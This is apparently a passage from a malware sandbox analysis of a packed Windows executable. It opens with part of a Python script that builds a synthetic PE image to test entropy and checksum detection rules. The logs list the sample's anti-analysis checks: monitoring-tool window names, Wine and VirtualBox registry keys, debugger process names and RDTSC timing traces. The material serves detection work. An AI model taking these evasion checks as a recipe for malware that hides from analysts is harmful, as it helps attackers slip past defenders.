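    hdr_end = e_lfanew + 4 + 20 + 224 + 40 * len(sections)
    size_of_headers = -(-hdr_end // file_align) * file_align
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                              # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                         # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, file_align)    # ImageBase, alignments
    struct.pack_into("<II", opt, 60, size_of_headers, stored_checksum)  # SizeOfHeaders, CheckSum
    struct.pack_into("<H", opt, 68, 2)                                 # IMAGE_SUBSYSTEM_WINDOWS_GUI
    struct.pack_into("<I", opt, 92, 16)                                # NumberOfRvaAndSizes
    table, body, raw_ptr = b"", b"", size_of_headers
    for name, rva, raw, chars in sections:
        padded = raw + b"\0" * (-len(raw) % file_align)
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(raw), rva,
                             len(padded), raw_ptr, 0, 0, 0, 0, chars)
        body, raw_ptr = body + padded, raw_ptr + len(padded)
    image = dos + b"PE\0\0" + coff + bytes(opt) + table
    return image + b"\0" * (size_of_headers - len(image)) + body


def sample_image(stored_checksum=0x44F6FB):
    """Layout modelled on the report: an unnamed section, .idata, a packed
    high-entropy section, and the entry point inside .taggant."""
    stub = bytes([0x55, 0x8B, 0xEC, 0xC3]) * 64     # low-entropy code-like bytes
    packed = bytes(range(256)) * 16                  # uniform bytes: entropy exactly 8.0
    rw, rwx = SCN_READ | SCN_WRITE, SCN_READ | SCN_WRITE | SCN_EXECUTE
    return build_pe([(b"", 0x1000, stub, rwx), (b".idata", 0x2000, stub, rw),
                     (b"vwhakcfb", 0x3000, packed, rwx), (b".taggant", 0x5000, stub, rwx)],
                    entry_rva=0x5010, stored_checksum=stored_checksum)
```

Two caveats when turning this into a rule. A checksum of zero is not evidence of anything: most unsigned binaries are linked without one, so only a non-zero mismatch (as here) points to post-link modification. And the entropy check needs a minimum section size; a few hundred bytes of anything can score above 7, which is why the script ignores sections shorter than 512 bytes. The entry point in .taggant, the IEEE software taggant marker that commercial packers append, combined with an EW section of entropy 7.96 is the packer signature the report is describing under "Detected unpacking".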

Boot Survival

Source: C:\Users\user\Desktop\wlEp68Few5.exe  Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\wlEp68Few5.exe  Window searched: window name: PROCMON_WINDOW_CLASS

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\wlEp68Few5.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\wlEp68Few5.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: PROCMON.EXE
Source: wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: X64DBG.EXE
Source: wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WINDBG.EXE
Source: wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: wlEp68Few5.exe, 00000000.00000003.1375010049.00000000072CF000.00000004.00001000.00020000.00000000.sdmp, wlEp68Few5.exe, 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C0CA47 second address: C0CA52 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C0412D second address: C04133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C04133 second address: C0413C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C0413C second address: C04142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C04142 second address: C04174 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 jnp 00007F6F946E7E43h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6F946E7E43h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C0BA45 second address: C0BA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C0BA4D second address: C0BA53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C0BA53 second address: C0BA57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C0BA57 second address: C0BA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jg 00007F6F946E7E59h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6F946E7E47h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C0C0DD second address: C0C0E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6F951A9EB6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C0C0E8 second address: C0C105 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F946E7E47h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C0C278 second address: C0C282 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6F951A9EB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C0C282 second address: C0C2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6F946E7E49h 0x0000000d jmp 00007F6F946E7E47h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C100CA second address: C100CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C10161 second address: C101A1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F6F946E7E44h 0x0000000c jmp 00007F6F946E7E3Eh 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 mov esi, dword ptr [ebp+122D37E9h] 0x0000001b push 00000000h 0x0000001d add dword ptr [ebp+122D1AE7h], edx 0x00000023 call 00007F6F946E7E39h 0x00000028 js 00007F6F946E7E40h 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C101A1 second address: C101C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 je 00007F6F951A9EBCh 0x0000000d jne 00007F6F951A9EB6h 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pop edx 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 ja 00007F6F951A9EB6h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C101C7 second address: C101DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C101DA second address: C102AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jg 00007F6F951A9ED2h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 jne 00007F6F951A9EC0h 0x0000001c pop eax 0x0000001d mov dword ptr [ebp+122D18CAh], eax 0x00000023 push 00000003h 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007F6F951A9EB8h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 00000016h 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f xor edx, dword ptr [ebp+122D23AEh] 0x00000045 mov dword ptr [ebp+122D1AE7h], esi 0x0000004b push 00000000h 0x0000004d movsx esi, di 0x00000050 push 00000003h 0x00000052 jmp 00007F6F951A9EC4h 0x00000057 push A11675BEh 0x0000005c jmp 00007F6F951A9EC1h 0x00000061 add dword ptr [esp], 1EE98A42h 0x00000068 jmp 00007F6F951A9EBFh 0x0000006d lea ebx, dword ptr [ebp+12455E76h] 0x00000073 mov dword ptr [ebp+122D23BAh], eax 0x00000079 push eax 0x0000007a push eax 0x0000007b push edx 0x0000007c push eax 0x0000007d push edx 0x0000007e js 00007F6F951A9EB6h 0x00000084 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C102AD second address: C102B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C103DF second address: C103E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C21E45 second address: C21E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C2EE6D second address: C2EE7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F6F951A9EB6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C2EE7A second address: C2EE94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6F946E7E36h 0x0000000a popad 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F6F946E7E3Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C2F003 second address: C2F02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F951A9EC9h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c jo 00007F6F951A9EBCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C2F02B second address: C2F056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F6F946E7E73h 0x0000000b jmp 00007F6F946E7E3Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6F946E7E44h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C2F1EA second address: C2F1EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C2F1EE second address: C2F1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C2F6CF second address: C2F6D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C2F82E second address: C2F84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F6F946E7E40h 0x0000000b jns 00007F6F946E7E36h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C2F84B second address: C2F860 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6F951A9EBCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C2F860 second address: C2F866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C2F866 second address: C2F880 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6F951A9EB6h 0x00000008 jmp 00007F6F951A9EBCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C2F880 second address: C2F884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C2FDB3 second address: C2FDD0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6F951A9EC8h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C2701F second address: C27023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C27023 second address: C27033 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6F951A9EB6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C27033 second address: C27039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C27039 second address: C27053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F6F951A9EB6h 0x0000000f jmp 00007F6F951A9EBBh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: BF19AA second address: BF19CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E44h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f jnc 00007F6F946E7E36h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: BF19CE second address: BF19DA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jng 00007F6F951A9EB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: BF19DA second address: BF19F0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6F946E7E3Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: BF19F0 second address: BF1A1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F6F951A9EB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f js 00007F6F951A9EB6h 0x00000015 jmp 00007F6F951A9EC8h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: BF1A1E second address: BF1A23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: BF1A23 second address: BF1A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C2FF07 second address: C2FF0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C306AD second address: C306B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C352C1 second address: C352C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C352C5 second address: C352D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C352D1 second address: C352EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E47h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C352EC second address: C352F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C352F2 second address: C35319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F6F946E7E3Dh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F6F946E7E40h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C35319 second address: C35326 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6F951A9EB8h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C3C658 second address: C3C65E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C3C65E second address: C3C67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6F951A9EC2h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C3C67B second address: C3C681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C3C681 second address: C3C690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C3C690 second address: C3C6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F6F946E7E47h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C3C6AE second address: C3C6B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C3BB58 second address: C3BB6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jmp 00007F6F946E7E3Bh 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C3BB6A second address: C3BB87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC3h 0x00000007 je 00007F6F951A9EC2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C3C32B second address: C3C330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C3C471 second address: C3C4BE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6F951A9EB6h 0x00000008 jc 00007F6F951A9EB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jp 00007F6F951A9EBAh 0x00000017 push edi 0x00000018 pop edi 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b jmp 00007F6F951A9EC2h 0x00000020 push eax 0x00000021 push edx 0x00000022 ja 00007F6F951A9EB6h 0x00000028 jmp 00007F6F951A9EC8h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C3C4BE second address: C3C4C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C3C4C2 second address: C3C4E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6F951A9EC7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C4140D second address: C41413 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C41413 second address: C41417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C41746 second address: C4174C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C41A4C second address: C41A71 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6F951A9EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6F951A9EC6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C42149 second address: C4214F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C4214F second address: C42154 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C42221 second address: C42228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C42228 second address: C4223B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F6F951A9EB8h 0x00000011 rdtsc
